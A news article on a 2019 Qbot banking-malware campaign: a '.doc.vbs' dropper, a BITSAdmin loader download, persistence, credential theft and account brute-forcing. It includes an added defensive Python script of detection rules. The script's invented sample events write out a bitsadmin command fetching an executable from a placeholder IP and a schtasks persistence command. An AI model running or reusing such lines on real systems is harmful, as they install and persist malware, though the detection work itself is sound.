Qbot malware resurfaces in new business attacks

A decade after its first detection, Qbot is compromising thousands of systems across the globe.
4 March 2019


The financial malware Qbot has surfaced once again with a new version that has reportedly attacked and infected thousands of systems.

The campaign is said to be actively targeting US corporations but has hit networks worldwide, across Europe, Asia and South America. The goal of the attacks is the theft of financial information, including bank account credentials.

According to data security solutions provider Varonis, which was first alerted to the attack by a customer, early observations suggest “thousands of victims around the globe are compromised and under active control by the attackers.”

First appearing in 2009, Qbot riled security professionals with its ability to evade detection. Openly available code means cybercriminals have continued to engineer various updates and modifications, making it increasingly adept at evading security systems.

Varonis was made aware of the latest attack by a customer who reported suspicious activity on a computer; the activity turned out to be Qbot (also known as Qakbot) attempting to infect other systems on the network.

Researchers traced the attack to an installer, or ‘dropper’, delivered as an email attachment with the double extension ‘.doc.vbs’. The file is a VBScript (VBS is a scripting language that Windows runs natively through the Windows Script Host, wscript.exe), but because Windows hides known file extensions by default it appears to the recipient as a Word document. Once executed, the script downloads the Qbot loader from a command-and-control server using BITSAdmin, the Windows command-line tool for the Background Intelligent Transfer Service.

Varonis notes that previous versions of Qbot used PowerShell to fetch the loader, but the attackers have moved to alternatives because PowerShell, now a common malware delivery mechanism, is closely monitored on enterprise systems. BITSAdmin deserves the same scrutiny: it is a signed Windows binary whose downloads blend in with legitimate update traffic, but the jobs it creates are recorded in the Microsoft-Windows-Bits-Client/Operational event log, and a script host such as wscript.exe spawning bitsadmin.exe with a /transfer argument is rarely legitimate.

Once installed, Qbot creates scheduled tasks and adds registry entries for persistence; it logs keystrokes, steals credentials and browser authentication cookies, and injects code into other processes to search for and steal financial-related text strings. It also attempts to brute-force network accounts drawn from the Active Directory Domain Users group, which means a single infected workstation can generate failed logons for many different accounts and, where a lockout policy is in force, lock legitimate users out.
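To make that chain concrete for defenders, here is an added example in Python that is not from Varonis or this article: a handful of detection rules run over constructed, invented telemetry in a Sysmon-like shape (process creation as event 1, failed logons as Security event 4625). The hostnames, paths, IP address, field names and the five-account threshold are all assumptions chosen to illustrate the behaviours described above; real deployments would feed the same rules from a SIEM or EDR export.

```python
import re
from collections import defaultdict

# Constructed sample telemetry (invented values, Sysmon-like field names) that mimics the
# chain described in the article: a .doc.vbs attachment run by wscript.exe, which calls
# bitsadmin.exe to fetch the loader, which persists via schtasks and then sprays
# Domain Users with password guesses. Two benign admin events are included as controls.
SAMPLE_EVENTS = [
    {"id": 1, "host": "WS01", "image": r"C:\Windows\System32\wscript.exe",
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "cmdline": r'"C:\Windows\System32\wscript.exe" "C:\Users\alice\AppData\Local\Temp\invoice_2019.doc.vbs"'},
    {"id": 1, "host": "WS01", "image": r"C:\Windows\System32\bitsadmin.exe",
     "parent": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"bitsadmin /transfer job1 /download /priority high http://198.51.100.7/update.dat C:\Users\alice\AppData\Roaming\Microsoft\update.exe"},
    {"id": 1, "host": "WS01", "image": r"C:\Windows\System32\schtasks.exe",
     "parent": r"C:\Users\alice\AppData\Roaming\Microsoft\update.exe",
     "cmdline": r'schtasks /create /tn "Microsoft Update" /tr C:\Users\alice\AppData\Roaming\Microsoft\update.exe /sc onlogon'},
    # benign control: an administrator listing BITS jobs from a command prompt
    {"id": 1, "host": "WS02", "image": r"C:\Windows\System32\bitsadmin.exe",
     "parent": r"C:\Windows\System32\cmd.exe", "cmdline": r"bitsadmin /list /allusers"},
    # benign control: a task created from a system location
    {"id": 1, "host": "WS02", "image": r"C:\Windows\System32\schtasks.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"schtasks /create /tn Backup /tr C:\Windows\System32\backup.cmd /sc daily"},
]
# Failed logons (Security 4625) as seen on the domain controller: WS01 tries six accounts,
# WS02 is just one user mistyping their own password twice.
SAMPLE_EVENTS += [{"id": 4625, "host": "DC01", "source_ws": "WS01", "target": u}
                  for u in ("alice", "bob", "carol", "dave", "erin", "frank")]
SAMPLE_EVENTS += [{"id": 4625, "host": "DC01", "source_ws": "WS02", "target": "bob"}] * 2

SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")
USER_WRITABLE = re.compile(r"\\(AppData|Temp|ProgramData|Public)\\", re.I)
DOUBLE_EXT = re.compile(r"\.(doc|docx|xls|xlsx|pdf|rtf)\.(vbs|vbe|js|jse|wsf|hta)\b", re.I)


def base(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def rule_double_extension(ev):
    """A script host launched on a file that hides a script behind a document extension."""
    return ev["id"] == 1 and base(ev["image"]) in SCRIPT_HOSTS and DOUBLE_EXT.search(ev["cmdline"]) is not None


def rule_script_bits_download(ev):
    """bitsadmin /transfer with a URL, spawned by a script host: the dropper's download step."""
    return (ev["id"] == 1 and base(ev["image"]) == "bitsadmin.exe"
            and base(ev["parent"]) in SCRIPT_HOSTS
            and "/transfer" in ev["cmdline"].lower()
            and re.search(r"https?://", ev["cmdline"], re.I) is not None)


def rule_task_from_user_dir(ev):
    """schtasks /create whose parent binary or task action lives in a user-writable directory."""
    if ev["id"] != 1 or base(ev["image"]) != "schtasks.exe" or "/create" not in ev["cmdline"].lower():
        return False
    return bool(USER_WRITABLE.search(ev["parent"]) or USER_WRITABLE.search(ev["cmdline"]))


def detect_bruteforce(events, min_accounts=5):
    """Group 4625 failures by source workstation; many distinct target accounts from one
    host is password spraying against the directory rather than a user's typo."""
    targets = defaultdict(set)
    for ev in events:
        if ev["id"] == 4625:
            targets[ev["source_ws"]].add(ev["target"].lower())
    return {ws: sorted(t) for ws, t in targets.items() if len(t) >= min_accounts}


def run_rules(events):
    """Apply the per-event rules and the aggregate rule; return (rule, host, detail) tuples."""
    alerts = []
    for ev in events:
        for rule in (rule_double_extension, rule_script_bits_download, rule_task_from_user_dir):
            if rule(ev):
                alerts.append((rule.__name__, ev["host"], base(ev["image"])))
    for ws, accounts in detect_bruteforce(events).items():
        alerts.append(("detect_bruteforce", ws, "%d accounts" % len(accounts)))
    return alerts


if __name__ == "__main__":
    for alert in run_rules(SAMPLE_EVENTS):
        print(alert)
```

Run against the constructed events, the three WS01 process events and the WS01 logon spray each raise one alert, while the two WS02 administrative events and the single mistyped password on WS02 raise none. The rules deliberately key on parent-child relationships and on binaries living under user-writable paths rather than on file hashes, because, as the article goes on to explain, Qbot's file names and loader change too often for hash matching to keep up.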

Gaining access to one of the ‘command and control’ servers used by the attackers, Varonis found logs showing 2,726 unique victim IP addresses, more than 1,700 of which were located in the US.

However, the company believes the number of infected systems is much larger, since computers inside an enterprise generally reach the internet through a shared (NAT) address, so a single victim IP in the logs can stand for an entire office of infected hosts.

Logs also showed that many of the compromised systems had antivirus products from various vendors installed, demonstrating the malware's ability to evade detection.

This is, in part, down to Qbot's polymorphic nature: it employs anti-analysis techniques and keeps adopting new infection vectors to stay ahead of defenders. It creates files and folders with random names, its dropper frequently changes C2 servers, and the loader itself changes whenever the infected host has an active internet connection, so file-hash signatures go stale quickly and behavioural detection matters more than signature matching.